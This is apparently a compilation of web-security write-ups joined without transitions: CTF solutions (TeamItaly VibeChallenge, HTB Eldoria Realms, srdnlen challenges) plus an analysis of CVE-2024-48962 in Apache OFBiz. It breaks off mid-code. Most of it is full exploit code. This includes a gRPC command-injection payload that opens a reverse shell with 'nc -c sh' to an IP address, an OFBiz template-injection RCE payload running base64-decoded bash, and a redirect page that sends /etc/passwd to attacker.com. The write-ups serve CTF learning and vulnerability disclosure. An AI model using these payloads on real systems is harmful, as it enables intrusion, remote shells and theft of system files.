# TeamItaly25 - VibeChallenge (Unintended Solution)

> A web challenge built on instinct, caffeine, and zero planning. Everything kind of works — and that's good enough. Follow the vibes. Something might happen.

## TLDR

Just follow the vibes...

"Phishing" the bot with an open redirect, a cache poisoning and some other tricks.

## The Target Bot

The goal is to steal flag from an headless bot. After we provide a URL, the bot will visit it and then perform a series of actions:

```php
$actions = [
        'browser' => 'chrome',
        'timeout' => 120,
        'actions' => [
            // 1. Visit our attacker-controlled URL and wait 10 seconds
            [ 'type' => 'request', 'url' => $_POST['url'], 'timeout' => 10 ],
            [ 'type' => 'sleep', 'time' => 10 ],

            // 2. Register a new account
            ['type' => 'request', 'url' => $CHALLENGE_URL . '/register.php', 'timeout' => 20 ],
            ['type' => 'type','element' => 'input#username','value' => $username],
            ['type' => 'click','element' => 'button#submit',],
            [ 'type' => 'sleep', 'time' => 5 ],

            // 3. Navigate to the bio page and paste the flag
            ['type' => 'request','url' => $CHALLENGE_URL . '/update_bio.php','timeout' => 20],
            ['type' => 'type','element' => 'textarea#bio','value' => $FLAG],
            ['type' => 'click','element' => 'button#submit',]
        ]
    ];
```


## Core Vulnerabilities

The challenge is an application built on a stack of Nginx, Apache, and PHP.

### 1. Web Cache Poisoning

Nginx is configured to cache responses for images, including 302 (redirect) responses. The cache key is based solely on the request URI.

```nginx
// nginx.conf
location ~ "^\/image\/([a-fA-F0-9]{...})" {
    rewrite "^\/image\/(?<uuid>...)$" /image.php?id=$uuid break;
    proxy_pass http://${BACKEND_HOST}:80;
    proxy_cache STATIC;
    proxy_cache_valid 200 302 1m; // Redirects are cached for 1 minute
    proxy_cache_key "$scheme$proxy_host$request_uri"; // Cache key ignores cookies
    proxy_hide_header Set-Cookie;
    proxy_ignore_headers Set-Cookie Cache-Control Expires;
}
```

This configuration allows for a web cache poisoning attack. If we can make a request to a cacheable URL (like `/image/some-uuid`) and trick the backend into issuing a redirect based on a cookie we provide, that redirect will be cached and served to every subsequent visitor of that URL.

### 2.Open Redirect

The application uses a `next` cookie to handle redirects after certain actions. For instance, after a user registers, the application will redirect them to the URL specified in the `next` cookie.

```php
// is_logged.php
if (!isset($_SESSION['user'])) {
    // ...
} else if (isset($_COOKIE['next'])) { // Authenticated users are redirected
    redirect($_COOKIE['next']);
    setcookie('next', '', -1, '/');
}
```
This is a standard open redirect vulnerability. The `next` cookie's value is not validated, allowing us to redirect users to an arbitrary external site.

### 3. Session Handling Quirks

The most subtle vulnerability lies in the session management logic. The session cookie's `path` attribute is dynamically set based on the request's path.

```php
// utils.php
function start_session(){
    $hardening_options = [
        'lifetime' => 6000,
        'path' => dirname($_SERVER['ORIG_PATH_INFO']), // Session path based on request path
        'domain' => $_SERVER['HTTP_HOST'],
        'httponly' => true,  
    ];
    session_set_cookie_params($hardening_options);
    session_start();
}
```

This means a session started by a request to `/foo.php` will be scoped to the path `/`. However, a session started by a request to `/foo/bar.php` will be scoped to `/foo`.

This creates a side effect: a user who is authenticated with a session on the root path (`/`) can be made to appear unauthenticated by making them request a URL with a sub-path. For example, if a logged-in user requests `/bio.php/some/path`, the application will attempt to start a session for the path `/bio.php/some`. The browser won't send the root session cookie for this new scope, so from the application's perspective, the user is not logged in (`$_SESSION` is empty).

When the application considers a user to be unauthenticated, it sets the `next` cookie to the current path to redirect them after login.

```php
// is_logged.php
if (!isset($_SESSION['user'])) {
    setcookie('next',  $_SERVER['ORIG_PATH_INFO'], path: "/"); // Set cookie if not logged in
    redirect('/register.php');
    // ...
}
```

This gives us a way to set the `next` cookie on an *already authenticated* user.

## Exploitation

1.  **Poison the Cache**

First, we'll poison the cache for a specific image URL (`/image/uuid`) by  making a request to that image URL with a `next` cookie pointing to our attacker server. The server will issue a redirect to our site, which Nginx will cache for that image URL.

2.  **Call the Bot**

We submit a URL to our attacker server to the bot. The page returned will execute JavaScript to orchestrate the attack in the background while the bot continues its programmed sequence of actions.

3.  **Setup - Session Manipulation**

Our script initiates a series of requests to set up the bot for the next step.
- It first requests `/bio.php/bio.php`. Because of the session path vulnerability, this creates an empty session scoped to `/bio.php`, effectively making the bot appear logged out on that path.
- It then requests `/update_bio.php`. Since the bot isn't authenticated yet, this sets the `next` cookie to `/update_bio.php`, ensuring that's where the bot goes after it registers. 
This specific step is necessary because without this request, the bot after the registration will be redirected to a location where it is not authenticated, overriding the valid session with an empty one. In fewer words the bot would be not authenticated even after the registration.

4.  **!Path Confusion!**

The bot's script proceeds: it sleeps for 10 seconds, then registers an account. After logging in, sleeps for 5 seconds. During this time window from our attacker page makes a request to `/bio.php/%252e%252e%252Fimage/uuid`. This specific path maps to `/bio.php`, where the user is unauthenticated so allows to set the `next` cookie. But its value will be `/bio.php/..%2fimage/uuid` that is equal to `/image/uuid` (because `..%2F` gets interpreted as `../`), our poisoned image URL!

This issue allows to set a redirect for any path, even for image paths where the next cookie is not normally set because of the nginx configuration `proxy_hide_header Set-Cookie;`.

5.  **"Phishing" the bot and getting the flag**: 

The bot wakes up and attempts to navigate to `/update_bio.php`. The application finds the `next` cookie we just planted and redirects the bot to the poisoned image URL. The request for the image hits the poisoned Nginx cache, which serves another redirect, this time to our phishing page. The bot, following the redirects, lands on our fake page, types the flag into the bio field, and submits it directly to us.

`TeamItaly{ch47gp7_54id_17_w45_f1n3_50_175_f1n3_1ce575c05a6b34b1}`  

## Exploit Flow


![](/vibe.svg)

## Full Exploit
`exploit.py`
```python
import requests
import uuid
import time
from urllib.parse import quote
import os

ATTACK_SERVER = "https://x.share.zrok.io" 

CHALLENGE_HOST = 'challenge03.it'

CHALLENGE_PORT = 443

with open("image.png", "wb") as f:
    f.write(b"\x89PNG\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x00\x00\x00\x01\x00\x00\x00\x01\x08\x06\x00\x00\x00\x1F\x15\xC4\x89\x00\x00\x00\x01\x73\x52\x47\x42\x00\xAE\xCE\x1C\xE9\x00\x00\x00\x04\x67\x41\x4D\x41\x00\x00\xB1\x8F\x0B\xFC\x61\x05\x00\x00\x00\x09\x70\x48\x59\x73\x00\x00\x0E\xC3\x00\x00\x0E\xC3\x01\xC7\x6F\xA8\x64\x00\x00\x00\x07\x74\x49\x4D\x45\x07\xE4\x07\x0B\x0B\x19\x1E\x1B\x45\x4D\x00\x00\x00\x00\x4C\x49\x44\x41\x54\x08\xD7\x63\xFC\xFF\xFF\xFF\x0F\x00\x00\x00\x00\xFF\xFF\xFF\x7F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")

class Exploit:
    def __init__(self, host, port):
        self.host = host
        self.port = port
        self.url = f"http{'s' if port == 443 else ''}://{host}:{port}"
        self.session = requests.Session()

    def register_user(self):
        username = str(uuid.uuid4())
        try:
            res = self.session.post(f"{self.url}/register.php", verify=False, data={"username": username}, timeout=5)
            if res.status_code == 200:
                print(f"[+] Successfully registered user: {username}")
                return True
            print(f"[-] Registration failed. Status: {res.status_code}")
            return False
        except requests.RequestException as e:
            print(f"[-] Registration request failed: {e}")
            return False

    def upload_payload_image(self):
        print("[*] Uploading img...")
        try:
            with open("image.png", "rb") as f:
                files = {"image": ("image.png", f, "image/png")}
                res = self.session.post(f"{self.url}/upload_image.php", verify=False, files=files, timeout=5, proxies={"http": "http://localhost:8081", "https": "http://localhost:8081"})
            
            image_path = res.text.split("href='")[1].split("'")[0]
            image_uuid = image_path.split("/")[-1]
            print(f"[+] Payload uploaded successfully. UUID: {image_uuid}")
            return image_uuid
        except Exception as e:
            print(f"[-] Failed to upload payload or parse UUID: {e}")
            print(f"    Response: {res.text}...")
            return None
        
    def solve_pow(self, pow):
        return os.popen(f"hashcash -mCb26 \"{pow}\"").read().replace("\n", "")

    def poison_cache(self, image_uuid):
        self.session.cookies["next"] = ATTACK_SERVER+"/phish"
        res = self.session.get(f"{self.url}/bio.php/..%2fimage/{image_uuid}", allow_redirects=False, verify=False, timeout=5, proxies={"http": "http://localhost:8081", "https": "http://localhost:8081"})
        print(f"[+] Poisoned cache")
        return res.text
    
    def call_bot(self):
        res = self.session.get(f"{self.url}/bot.php", verify=False, timeout=5, proxies={"http": "http://localhost:8081", "https": "http://localhost:8081"})
        get_pow = res.text.split("Proof of Work of ")[1].split("</label>")[0]
        print(f"[+] POW: {get_pow}")
        pow = self.solve_pow(get_pow)
        if not pow:
            return
        print(f"[+] Solved POW: {pow}")
        res = self.session.post(f"{self.url}/bot.php", verify=False, timeout=5, proxies={"http": "http://localhost:8081", "https": "http://localhost:8081"}, data={"url": ATTACK_SERVER, "pow": pow})
        print(f"[+] Bot response: {res.text}")
        return res.text

    def exploit(self):
        if not self.register_user():
            return
            
        image_uuid = self.upload_payload_image()
        if not image_uuid:
            return
        with open("image_uuid", "w") as f:
            f.write(image_uuid)
        
        print(self.poison_cache(image_uuid))
        self.call_bot()


solver = Exploit(CHALLENGE_HOST, CHALLENGE_PORT)
solver.exploit()
```

`server.py`
```python
from flask import Flask, request

app = Flask(__name__)

# host = "http://nginx"
host = "https://challenge03.it"

@app.route('/')
def index():
    return """
<script>
    window.open("/attack", "_blank");
</script>
"""

@app.route('/phish', methods=['GET', 'POST'])
def phish():
    # phish the bot
    if request.method == "POST":
        print(request.form)
    return """
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <title>Update Bio</title>
</head>

<body>
    <form method="POST" action="/phish">
        <textarea name="bio" class="form-control" autofocus id="bio" rows="5" placeholder="Write something about yourself...like a flag" required></textarea>
        <button id="submit" type="submit" class="btn btn-success w-100">Save</button>
    </form>
</body>
"""

@app.route('/attack')
def attack():
    return """
<script>
window.open("/slog", "_blank");

setTimeout(() => window.open("/set_next", "_blank"), 1000);

setTimeout(() => window.open("/set_redirect", "_blank"), 22500);
</script>
"""

@app.route('/slog')
def slog():
    return f"""
<script>
    location = '{host}/bio.php/bio.php';
</script>
"""

@app.route('/set_next')
def set_next():
    return f"""
<script>
    location = '{host}/update_bio.php';
</script>
"""

@app.route('/set_redirect')
def set_redirect():
    image_uuid = ""
    with open("image_uuid", "rb") as f:
        image_uuid = f.read().decode("utf-8")
    return f"""
<script>
    location = '{host}/bio.php/%252e%252e%252Fimage/{image_uuid}';
</script>
"""

if __name__ == '__main__':
    app.run(debug=True, port=5000)
```

TeamItaly25 - VibeChallenge (Unintended Solution)

# CVE-2024-48962: From Simple Redirection to RCE via Server-Side Template Injection in Apache OFBiz

**CVE Score: 8.9** - CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/AU:N/R:U/V:C/RE:H/U:Amber

*Research by [@sebsrt](https://github.com/sebastianosrt) and [@marimoo](https://www.linkedin.com/in/ryanchan07/)*

---

## TL;DR

We discovered a critical Server-Side Template Injection (SSTI) vulnerability in Apache OFBiz that enables unauthenticated attackers to achieve Remote Code Execution (RCE) by convincing authenticated users to click a malicious link. The vulnerability affects all versions prior to 18.17 and can be exploited through a simple URL parameter injection.

**Proof of Concept:**
```
https://target.com/partymgr/control/viewprofile?partyId=${Static["org.apache.ofbiz.base.util.GroovyUtil"].eval("\'bash -c {echo,BASE64_COMMAND}|{base64,-d}|bash\'.execute()",null)}
```

---

## Introduction

Apache OFBiz is an open-source CRM & ERP system built in Java. 

This vulnerability ([CVE-2024-48962](https://www.cve.org/CVERecord?id=CVE-2024-48962)) begins as a simple parameter injection escalates to full RCE through FreeMarker template injection combined with a sandbox bypass leveraging OFBiz's own utility classes.

---

## Technical Deep Dive

### Overview

The vulnerability lies within the `/partymgr/control/viewprofile` endpoint, where the `partyId` query parameter undergoes processing without adequate sanitization before being passed to FreeMarker template rendering. This allows attackers to inject malicious template syntax that executes server-side.

### Tracing the Vulnerable Code Path

Let's trace the execution flow from the initial HTTP request to the vulnerable code execution:

#### 1: Request Routing
When an HTTP request targets `/partymgr/control/viewprofile`, OFBiz routes it through its controller configuration system:

**File:** `applications/party/webapp/partymgr/WEB-INF/controller.xml`
```xml
<request-map uri="viewprofile">
    <security https="true" auth="true"/>
    <response name="success" type="view" value="viewprofile"/>
</request-map>

<view-map name="viewprofile" type="screen" 
          page="component://party/widget/partymgr/PartyScreens.xml#viewprofile"/>
```

#### 2: Screen Definition Processing
The request maps to a screen definition that extracts and processes the `partyId` parameter:

**File:** `applications/party/widget/partymgr/PartyScreens.xml`
```xml
<screen name="viewprofile">
    <section>
        <actions>
            <set field="partyId" from-field="parameters.partyId"/>
            <script location="component://party/groovyScripts/party/ViewProfile.groovy"/>
        </actions>
        <widgets>
            <decorator-screen name="CommonPartyDecorator" location="${parameters.mainDecoratorLocation}">
                
            </decorator-screen>
        </widgets>
    </section>
</screen>
```

#### 3: Parameter Processing
The `ViewProfile.groovy` script extracts and processes the user-supplied `partyId` value:

**File:** `applications/party/groovyScripts/party/ViewProfile.groovy`
```groovy
partyId = parameters.partyId ?: parameters.party_id
// ... additional processing logic ...
context.partyId = partyId  // User input flows directly into context
```

#### 4: Menu Rendering
The `CommonPartyDecorator` includes navigation menus that consume the `partyId` parameter:

**File:** `applications/party/widget/partymgr/CommonScreens.xml`
```xml
<screen name="CommonPartyDecorator">
    <section>
        <actions>
            <set field="partyId" from-field="parameters.partyId"/>
        </actions>
        <widgets>
            <include-menu name="ProfileTabBar" location="component://party/widget/partymgr/PartyMenus.xml"/>
            <include-menu name="ProfileSubTabBar" location="component://party/widget/partymgr/PartyMenus.xml"/>
        </widgets>
    </section>
</screen>
```

#### 5: The Vulnerable Template Generation
Menu items incorporate the user-controlled `partyId` as a parameter:

**File:** `applications/party/widget/partymgr/PartyMenus.xml`
```xml
<menu-item name="viewprofile" title="${uiLabelMap.PartyProfile}">
    <link target="viewprofile">
        <parameter param-name="partyId"/>  
    </link>
</menu-item>
```

When these menus render, the `MacroMenuRenderer.executeMacro()` method constructs dynamic FreeMarker templates:

**File:** `framework/widget/src/main/java/org/apache/ofbiz/widget/renderer/macro/MacroMenuRenderer.java`
```java
private void executeMacro(Appendable writer, String macroName, Map<String, Object> macroParameters) 
        throws IOException, TemplateException {
    StringBuilder sb = new StringBuilder("<@");
    sb.append(macroName);
    if (macroParameters != null) {
        for (Map.Entry<String, Object> parameter : macroParameters.entrySet()) {
            sb.append(' ');
            sb.append(parameter.getKey());
            sb.append("=");
            Object value = parameter.getValue();
            if (value instanceof String) {
                sb.append('"');
                // Only escapes quotes, not FreeMarker syntax!
                sb.append(((String) value).replaceAll("\"", "\\\\\""));
                sb.append('"');
            } else {
                sb.append(value);
            }
        }
    }
    sb.append(" />");
    
    // Executes the dynamically constructed template
    executeMacro(writer, sb.toString());
}

private void executeMacro(Appendable writer, String macro) throws IOException, TemplateException {
    Reader templateReader = new StringReader(macro);
    Template template = new Template(templateName, templateReader, FreeMarkerWorker.getDefaultOfbizConfig());
    environment.include(template);  // ⚠️ Template injection occurs here
}
```

**Attack Flow Visualization:**

When `partyId=MALICIOUS_INPUT` contains FreeMarker syntax, it becomes embedded in a macro call:
```freemarker
<@renderMenuItemBegin linkStr="/partymgr/control/viewprofile?partyId=MALICIOUS_INPUT" />
```

For example, if `MALICIOUS_INPUT` is `${7*7}`, the generated template becomes:
```freemarker
<@renderMenuItemBegin linkStr="/partymgr/control/viewprofile?partyId=${7*7}" />
```

When FreeMarker processes this template, it evaluates `${7*7}` as an expression, producing `49` in the output.

---

## Exploitation: Bypassing FreeMarker Sandbox - From Template Injection to RCE

FreeMarker typically operates within a restricted environment, but OFBiz exposes utility classes accessible via the `Static` hash.

```bash
grep -r "static.*eval" --include="*.java" .

./framework/base/src/main/java/org/apache/ofbiz/base/util/GroovyUtil.java:    public static Object eval(String expression, Map<String, Object> context) throws CompilationFailedException {
```

This search revealed `GroovyUtil.eval()` within the OFBiz framework:

**File:** `framework/base/src/main/java/org/apache/ofbiz/base/util/GroovyUtil.java`
```java
public static Object eval(String expression, Map<String, Object> context) throws CompilationFailedException {
    // ...
    GroovyShell shell = new GroovyShell(getBinding(context, expression));
    Object result = shell.evaluate(StringUtil.convertOperatorSubstitutions(expression));
    // ...
}
```

This method provides a direct pathway to execute arbitrary Groovy code, effectively circumventing FreeMarker's security sandbox.

### Escalation to Remote Code Execution

Using the `GroovyUtil.eval()` method, we can achieve various levels of system compromise:

```
${Static["org.apache.ofbiz.base.util.GroovyUtil"].eval("'bash -c {echo,BASE64_COMMAND}|{base64,-d}|bash'.execute()", null)}
```

### Final exploit

An attacker can just craft a page that executes a redirect, and delivers it to an authenticated OFBiz user:

```html
<script>
location = 'https://target-ofbiz.com/partymgr/control/viewprofile?partyId=${Static["org.apache.ofbiz.base.util.GroovyUtil"].eval("\'curl -X POST -d @/etc/passwd http://attacker.com/exfil\'.execute()", null)}';
</script>
```

---

## The Fix: Proper Input Sanitization

Apache OFBiz addressed this vulnerability in version 18.17 by implementing comprehensive parameter value encoding before template generation:

**File:** `framework/widget/src/main/java/org/apache/ofbiz/widget/renderer/macro/MacroMenuRenderer.java`
```java
// Before: Direct parameter inclusion (vulnerable)
sb.append(((String) value).replaceAll("\"", "\\\\\""));

// After: Proper encoding using SimpleEncoder (secure)
UtilCodec.SimpleEncoder simpleEncoder = (UtilCodec.SimpleEncoder) context.get("simpleEncoder");
if (simpleEncoder != null) {
    targetParameters.append(simpleEncoder.encode(parameter.getValue()));
} else {
    targetParameters.append(parameter.getValue());
}
```

A detailed analysis of CVE-2024-48962, a Server-Side Template Injection (SSTI) vulnerability in Apache OFBiz, and how it can be exploited to achieve Remote Code Execution (RCE).

CVE-2024-48962: SSTI with Freemarker sandbox bypass leading to RCE

Intigriti XSS - Leaky fragment

# Eldoria Realms
## TLDR
ruby class pollution -> SSRF -> Command Injection -> RCE
## Description
> A portal that allows players of Eldoria to transport between realms, take on quests, and manage their stats. See if it's possible to break out of the realm to gather more info on Malakar's spells inner workings.
## Overview
There are 2 services: an api made with **ruby**, and a **grpc** backend.
## Road to flag
The flag is in `/flag.txt` -> RCE
## Code review
#### Frontend API
- `/connect-realms` and makes a request using **curl** to `realm_url`
```ruby
get "/connect-realm" do
		content_type :json
		if Adventurer.respond_to?(:realm_url)
			realm_url = Adventurer.realm_url
			begin
				uri = URI.parse(realm_url)
				stdout, stderr, status = Open3.capture3("curl", "-o", "/dev/null", "-w", "%{http_code}", uri)
				{ status: "HTTP request made", realm_url: realm_url, response_body: stdout }.to_json
			rescue URI::InvalidURIError => e
				{ status: "Invalid URL: #{e.message}", realm_url: realm_url }.to_json
			end
		else
			{ status: "Failed to access realm URL" }.to_json
		end
	end
```

`realm_uri` is hardcoded into `Adventurer`
```ruby
class Adventurer
	@@realm_url = "http://eldoria-realm.htb"

	attr_accessor :name, :age, :attributes

	def self.realm_url
		@@realm_url
	end
[ . . . ]
```

- Ruby class pollution in `app.rb` `post "/merge-fates"` -> allows to override `realm_url` leading to **SSRF**
A `Player` object is merged with the json taken in input.
```ruby
post "/merge-fates" do
		content_type :json
		json_input = JSON.parse(request.body.read)
		random_attributes = {
			"class" => ["Warrior", "Mage", "Rogue", "Cleric"].sample,
			"guild" => ["The Unbound", "Order of the Phoenix", "The Fallen", "Guardians of the Realm"].sample,
			"location" => {
				"realm" => "Eldoria",
				"zone" => ["Twilight Fields", "Shadow Woods", "Crystal Caverns", "Flaming Peaks"].sample
			},
			"inventory" => []
		}

		$player = Player.new(
			name: "Valiant Hero",
			age: 21,
			attributes: random_attributes
		)

		$player.merge_with(json_input)
		{ 
			status: "Fates merged", 
			player: { 
				name: $player.name, 
				age: $player.age, 
				attributes: $player.attributes 
			} 
		}.to_json
	end
```

The merge function is vulnerable to class pollution -> https://blog.doyensec.com/2024/10/02/class-pollution-ruby.html.
```ruby
def recursive_merge(original, additional, current_obj = original)
    additional.each do |key, value|
      if value.is_a?(Hash)
        if current_obj.respond_to?(key)
          next_obj = current_obj.public_send(key)
          recursive_merge(original, value, next_obj)
        else
          new_object = Object.new
          current_obj.instance_variable_set("@#{key}", new_object)
          current_obj.singleton_class.attr_accessor key
        end
      else
        current_obj.instance_variable_set("@#{key}", value)
        current_obj.singleton_class.attr_accessor key
      end
    end
```

`Player` class is derived from `Adventurer`


#### Backend API
- The backend API uses **GRPc**, and has a command injection in `/healthCheck`
```go 
package main

import (
	"app/pb"
	"context"
	"fmt"
	"log"
	"net"
	"os/exec"
	"time"
	"google.golang.org/grpc"
	"google.golang.org/grpc/reflection"
)

type server struct {
	pb.UnimplementedLiveDataServiceServer
	ip   string
	port string
}

[ . . .]

func healthCheck(ip string, port string) error {
	cmd := exec.Command("sh", "-c", "nc -zv "+ip+" "+port)
	output, err := cmd.CombinedOutput()
	if err != nil {
		log.Printf("Health check failed: %v, output: %s", err, output)
		return fmt.Errorf("health check failed: %v", err)
	}

	log.Printf("Health check succeeded: output: %s", output)
	return nil
}
```

## Exploitation
1. SSRF
How can I make a valid curl request to the grpc backend?
- It's possible to send raw TCP requests using `curl` and the `gopher` protocol.
- GRPC uses HTTP2, so I have to build a valid packet that I can send with the `gopher` protocol.
  It's possible to build a raw HTTP2 request using [`hyperframe`](https://github.com/python-hyper/hyperframe/).

Note: this works because curl `7.70.0` is used.
   ```dockerfile
   RUN wget https://curl.haxx.se/download/curl-7.70.0.tar.gz && \
       tar xfz curl-7.70.0.tar.gz && \
       cd curl-7.70.0/ && \
       ./configure --with-ssl --enable-shared && \
       make -j16 && \
       make install && \
       ldconfig
   ```
   
2. Class pollution
I can override `realm_uri` by sending a request `POST /merge-fates` with this payload: `{"class": { "superclass": { "realm_url": f"gopher://localhost:50051/_{payload}"}}}`


Flag: `HTB{p0llut3_4nd_h1t_pr0toc0lz_w_4_sw1tch_4252fa6a48618f89a46262d3e1855ba2}`
## Full exploit
```python
from hyperframe.frame import HeadersFrame, DataFrame, SettingsFrame
from hpack import Encoder
import struct
from urllib.parse import quote
import live_data_pb2
import requests

def create_health_check_request(ip, port):
    request = live_data_pb2.HealthCheckRequest()
    request.ip = ip
    request.port = port
    return request.SerializeToString()

preface = b"PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n"
request_payload = create_health_check_request(ip="127.0.0.1", port="$(nc -c sh 37.27.184.43 4444)")

# Add gRPC prefix to the payload (5 bytes)
grpc_payload = struct.pack(">BI", 0, len(request_payload)) + request_payload  # Compression flag + length
# Build HTTP/2 frames
stream_id = 1
encoder = Encoder()
# SETTINGS frame (required for handshake)
settings_frame = SettingsFrame(stream_id=0)
settings = settings_frame.serialize()
# HEADERS frame (with required pseudo-headers)
headers = [
    (":method", "POST"),
    (":path", "/live.LiveDataService/CheckHealth"),
    (":scheme", "http"),
    (":authority", "localhost:50051"),
    ("content-type", "application/grpc"),
    ("te", "trailers"),
]
headers_frame = HeadersFrame(stream_id=stream_id)
headers_frame.data = encoder.encode(headers)
headers_frame.flags.add("END_HEADERS")
headers = headers_frame.serialize()
# DATA frame (gRPC payload)
data_frame = DataFrame(stream_id=stream_id)
data_frame.data = grpc_payload
data_frame.flags.add("END_STREAM")
data = data_frame.serialize()

payload = quote(preface + settings + headers + data)

url = "http://94.237.50.164:49095/"

requests.post(url+"/merge-fates", json={"class": { "superclass": { "realm_url": f"gopher://localhost:50051/_{payload}"}}})

response = requests.get(url+"/connect-realm")
print(response.text)
```

HTB CyberApochalipse25 - Eldoria Realms

# Focus. Speed. I am speed.
#race-condition #nosqli 
## Description
> Welcome to Radiator Springs' finest store, where every car enthusiast's dream comes true! But remember, in the world of racing, precision matters—so tread carefully as you navigate this high-octane experience. Ka-chow! 
> Website: [http://speed.challs.srdnlen.it:8082](http://speed.challs.srdnlen.it:8082) 
> Author: [@Octaviusss](https://github.com/Octaviusss)
## Overview
It's a simple shop that allows to buy some items and to redeem coupons. After the registration the user has 0 points in the balance.
## Road to flag
The goal is to reach 50 points in order to buy the flag.
## Code review
1. `app.js`
Upon app creation the products, and only one coupon is added in the database.

```js
async function App() {
    const app = express();
    //[...]
    const products = [
        { productId: 1, Name: "Lightning McQueen Toy", Description: "Ka-chow! This toy goes as fast as Lightning himself.", Cost: "Free" },
        { productId: 2, Name: "Mater's Tow Hook", Description: "Need a tow? Mater's here to save the day (with a little dirt on the side).", Cost: "1 Point" },
        { productId: 3, Name: "Doc Hudson's Racing Tires", Description: "They're not just any tires, they're Doc Hudson's tires. Vintage!", Cost: "2 Points" },
        { 
            productId: 4, 
            Name: "Lightning McQueen's Secret Text", 
            Description: "Unlock Lightning's secret racing message! Only the fastest get to know the hidden code.", 
            Cost: "50 Points", 
            FLAG: process.env.FLAG || 'SRDNLEN{fake_flag}' 
        }
    ];
    

    //[...]

    // Insert randomly generated Discount Codes if they don't exist
    const createDiscountCodes = async () => {
        const discountCodes = [{ discountCode: generateDiscountCode(), value: 20 }];
		// [...]
		await DiscountCodes.create(code);
		// [...]
    };

    // Call function to insert discount codes
    await createDiscountCodes();

    app.use('/', (req, res) => {
        res.status(404);
        if (req.accepts('html') || req.accepts('json')) {
            return res.render('notfound');
        }
    });

    return app;
}
```

1. `/redeem`
This route handles the redeem of a discount codes. It checks for a valid discount code, verifies it hasn't been used today by the user and adds the discount to the user's balance.

Two vulnerabilities can be identified in this code:

- No-SQL Injection in `const discount = await DiscountCodes.findOne({discountCode})`

	It is vulnerable to operator injection: by requesting `/redeem?discountCode[$ne]=x` the operator `$ne` is used in the query -> `DiscountCodes.findOne({ discountCode: { $ne: "" } });`
	permitting to **redeem any discount code** existing in the database.

- Race condition

    multiple requests can execute the **read-modify-write** sequence on the user's balance concurrently, permitting to **use the same discount code multiple times**. The delay `new Promise(resolve => setTimeout(resolve, delay * 1000));` exacerbates the race condition by increasing the window of time during which concurrent requests can interfere with each other.

```js
router.get('/redeem', isAuth, async (req, res) => {
    try {
        // [...]
        let { discountCode } = req.query;
        const discount = await DiscountCodes.findOne({discountCode})

        if (!discount)
            return res.render('error', { Authenticated: true, message: 'Invalid discount code!' });

        // Check if the voucher has already been redeemed today
        const today = new Date();
        const lastRedemption = user.lastVoucherRedemption;

        if (lastRedemption) {
            const isSameDay = lastRedemption.getFullYear() === today.getFullYear() &&
                              lastRedemption.getMonth() === today.getMonth() &&
                              lastRedemption.getDate() === today.getDate();
            if (isSameDay) {
                return res.json({success: false, message: 'You have already redeemed your gift card today!' });
            }
        }

        // Apply the gift card value to the user's balance
        const { Balance } = await User.findById(req.user.userId).select('Balance');
        user.Balance = Balance + discount.value;
        // Introduce a slight delay to ensure proper logging of the transaction 
        // and prevent potential database write collisions in high-load scenarios.
        new Promise(resolve => setTimeout(resolve, delay * 1000));
        user.lastVoucherRedemption = today;
        await user.save();

        return res.json({
            success: true,
            message: 'Gift card redeemed successfully! New Balance: ' + user.Balance // Send success message
        });

    } catch (error) {
        console.error('Error during gift card redemption:', error);
        return res.render('error', { Authenticated: true, message: 'Error redeeming gift card'});
    }
});
```

## Exploitation
1. Exploit the NoSQLi + race condition in order to increase the balance:
    Make many concurrent requests to `/redeem?discountCode[$ne]=x` (i used burp's last-byte sync)
2. Buy the flag

`srdnlen{6peed_1s_My_0nly_Competition}`

---
# Average HTTP3 Enjoyer
#http3 #haproxy #access-control 
## Description
> HTTP/3 is just the best version of HTTP, wait a few years ~~, until setting up an HTTP/3 server will not be a pain,~~ and you’ll see. I hid a secret on /flag, you can only get it if you become a real HTTP/3 enjoyer.
> NOTE: This challenge uses only HTTP/3, browsers are a bit hesitant in using it by default, so you’ll have to use explicit arguments to do so.
> In chrome you can do the following: `chrome --enable-quic --origin-to-force-quic-on=enjoyer.challs.ctf.srdnlen.it`

## Code review
- the flag is returned by `/flag`
```python
@app.route('/flag')
def flag():
    return "srdnlen{f4k3_fl4g}"
```

- the app uses **haproxy** and **http3**
there's a rule that forbids the access to `/flag`, if `/flag` (case insensitive) is in the request url: `acl restricted_flag path_sub,url_dec -m sub -i i /flag`

```
[ . . . ]

frontend haproxy
  bind quic4@:443 ssl crt /etc/haproxy/certs/cert.crt alpn h3
  http-request redirect scheme https unless { ssl_fc }
  http-response set-header alt-svc "h3=\":443\";ma=900;"
  option httplog
  acl restricted_flag path_sub,url_dec -m sub -i i /flag
  http-request deny if restricted_flag

default_backend backend_server

backend backend_server
  balance roundrobin
  server backend_server backend-server:8080
```

## Exploitation
1. Haproxy acl rule bypass
In HTTP2 and 3 the `:path` pseudoheader is used to specify the request target.
To bypass the rule I can just set `:path: flag`

To send the request I used [aioquic](https://github.com/aiortc/aioquic):
`python http3client.py https://enjoyer.challs.ctf.srdnlen.it/ --output-dir . -i -H ':path: flag'`

- profit
`srdnlen{you_found_the_:path_for_becoming_a_real_http3_enjoyer}`

---


# Ben10
## Description
> Ben Tennyson's Omnitrix holds a mysterious and powerful form called Materia Grigia — a creature that only those with the sharpest minds can access. It's hidden deep within the system, waiting for someone clever enough to unlock it. Only the smartest can access what’s truly hidden.
Can you outsmart the system and reveal the flag?
Website: [http://ben10.challs.srdnlen.it:8080](http://ben10.challs.srdnlen.it:8080)
Author: @gheddus
## Overview
It's a simple website that allows to authenticate and view some images.
## Road to flag
The flag is given for admin users that view the image `ben10`

```python
@app.route('/image/<image_id>')
def image(image_id):
    """Display the image if user is admin or redirect with missing permissions."""
    if 'username' not in session:
        return redirect(url_for('login'))

